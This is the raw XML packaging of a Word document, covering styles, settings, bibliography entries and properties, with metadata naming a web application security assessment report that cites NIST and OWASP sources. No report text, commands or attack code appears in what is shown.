  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="002E4258"/>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2E4258"/>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2E4258"/>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2E425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444A5"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:semiHidden/>
    <w:rsid w:val="00E444A5"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="00E444A5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="008B749C"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001E3DA0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001E3DA0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001E3DA0"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="008F1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E4258"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="400"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="600"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="800"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="1000"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="1400"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="002E4258"/>
    <w:pPr>
      <w:ind w:left="1600"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00454611"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:semiHidden/>
    <w:rsid w:val="00D7561B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="00321DA3"/>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:semiHidden/>
    <w:rsid w:val="00321DA3"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="marker">
    <w:name w:val="marker"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007766F6"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ASVSBodyStyle">
    <w:name w:val="ASVS Body Style"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ASVSBodyStyleChar"/>
    <w:rsid w:val="000C1C85"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
      <w:color w:val="0B4D76"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ASVSBodyStyleChar">
    <w:name w:val="ASVS Body Style Char"/>
    <w:link w:val="ASVSBodyStyle"/>
    <w:rsid w:val="000C1C85"/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
      <w:color w:val="0B4D76"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005716AA"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00C079B2"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00C079B2"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="MediumList2-Accent1">
    <w:name w:val="Medium List 2 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="66"/>
    <w:rsid w:val="009A5C68"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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Classic2">
    <w:name w:val="Table Classic 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="009A5C6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9A5C6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A5C6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1">
    <w:name w:val="Light Grid Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="00281E1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1">
    <w:name w:val="Light List Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="61"/>
    <w:rsid w:val="00281E1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FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:rsid w:val="004672B3"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableColumns3">
    <w:name w:val="Table Columns 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00B5204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unhideWhenUsed/>
    <w:rsid w:val="00FF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FF5964"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:rsid w:val="003775DD"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE65EE"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B73881"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="32"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00B73881"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A7D7F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="textlayer--absolute">
    <w:name w:val="textlayer--absolute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0094305D"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00793E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0746">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="508759168">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="728071058">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="970944823">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1300724141">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1599826384">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="168613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secure-bankin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insecure-banking" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.insecure-bank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FBF0B9CEACA34A981A7F46EA19F3F9" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="99bbe3d82eb3a1ff54d9d89c78faae08">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="fd550b8b-0dd7-4de3-a8e6-af527f15a8ac" xmlns:ns4="45cbc027-4fdb-4325-ba4c-14e20f088a7f" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="27682e30aa876bb2d227c8264cab8997" ns3:_="" ns4:_="">
    <xsd:import namespace="fd550b8b-0dd7-4de3-a8e6-af527f15a8ac"/>
    <xsd:import namespace="45cbc027-4fdb-4325-ba4c-14e20f088a7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550b8b-0dd7-4de3-a8e6-af527f15a8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cbc027-4fdb-4325-ba4c-14e20f088a7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Mil071</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{66BEDD21-952B-41A1-8E1D-DA0454C79E5C}</b:Guid>
    <b:Title>Guidelines on Securing Public Web Servers</b:Title>
    <b:Year>2007</b:Year>
    <b:Month>September</b:Month>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Miles Tracy (Federal Reserve Information Technology)</b:Last>
            <b:First>Wayne</b:First>
            <b:Middle>Jansen (NIST), Karen Scarfone (NIST), Theodore Winograd (BAH)</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>NIST</b:JournalName>
    <b:Pages>800-44</b:Pages>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>OWA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{EC0E266A-1E0B-4E34-89FF-02DAC72DAC6B}</b:Guid>
    <b:Title>OWASP Application Security Verification Standard</b:Title>
    <b:InternetSiteTitle>OWASP</b:InternetSiteTitle>
    <b:URL>https://owasp.org/www-project-application-security-verification-standard/</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DSK20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9BD970B8-92D3-46AA-A10B-ED7AB98D442D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>D. S. Kim</b:Last>
            <b:First>M.</b:First>
            <b:Middle>Kim, J. -H. Cho, H. Lim, T. J. Moore and F. F. Nelson</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Design and Performance Analysis of Software Defined Networking Based Web Services Adopting Moving Target Defense</b:Title>
    <b:JournalName>IEEE</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>43-44</b:Pages>
    <b:DOI>10.1109/DSN-S50200.2020.00024</b:DOI>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ant20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{653C749E-4E1B-4DF7-A103-92407446A2B5}</b:Guid>
    <b:Title>Database Traffic Interception for Graybox Detection of Stored and Context-sensitive XSS</b:Title>
    <b:JournalName>ACM Journals</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Antonín Steinhauser</b:Last>
            <b:First>Petr</b:First>
            <b:Middle>Tůma</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Volume>1</b:Volume>
    <b:Issue>3</b:Issue>
    <b:ShortTitle>Digital Threats: Research and Practice</b:ShortTitle>
    <b:DOI>https://doi-org.ezproxy.liberty.edu/10.1145/3399668</b:DOI>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NAn20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{52D0816A-93C0-4721-A8FD-400740D969EA}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Wukkadada</b:Last>
            <b:First>N.</b:First>
            <b:Middle>Anantharaman and B.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Identifying The Usage Of Known Vulnerabilities Components Based On OWASP A9</b:Title>
    <b:JournalName>IEEE</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>88-91</b:Pages>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sun20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E24F23F5-3DE8-4A44-9380-8E8C2EDDDF7F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sunaringtyas</b:Last>
            <b:First>V.</b:First>
            <b:Middle>N. Nanisura Damanik and S. U.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Secure Code Recommendation Based on Code Review Result Using OWASP Code Review Guide</b:Title>
    <b:JournalName>IEEE</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>153-158</b:Pages>
    <b:DOI>10.1109/IWBIS50925.2020.9255559.</b:DOI>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5428F61D-E5A3-489D-A27C-EB696AF64D6C}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FEBF2297-4735-4EF9-97C3-C1DAE7F6F0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35D8CE-876F-41A9-BC42-2A508612D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550b8b-0dd7-4de3-a8e6-af527f15a8ac"/>
    <ds:schemaRef ds:uri="45cbc027-4fdb-4325-ba4c-14e20f088a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8207F7-CE96-41E7-AC8E-70ECD361A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26</Pages>
  <Words>4403</Words>
  <Characters>25101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Web Application Security Assessment Report</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Booz Allen Hamilton</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>29446</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="258" baseType="variant">
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>254</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402742</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>248</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402741</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441846</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>242</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402740</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031665</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>236</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402739</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966129</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>230</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402738</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114161</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>224</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402737</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>218</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402736</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245233</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>212</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402735</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179697</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>206</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402734</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376305</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>200</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402733</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310769</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>194</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402732</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507377</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>188</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402731</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441841</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>182</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402730</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031664</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>176</vt:i4>
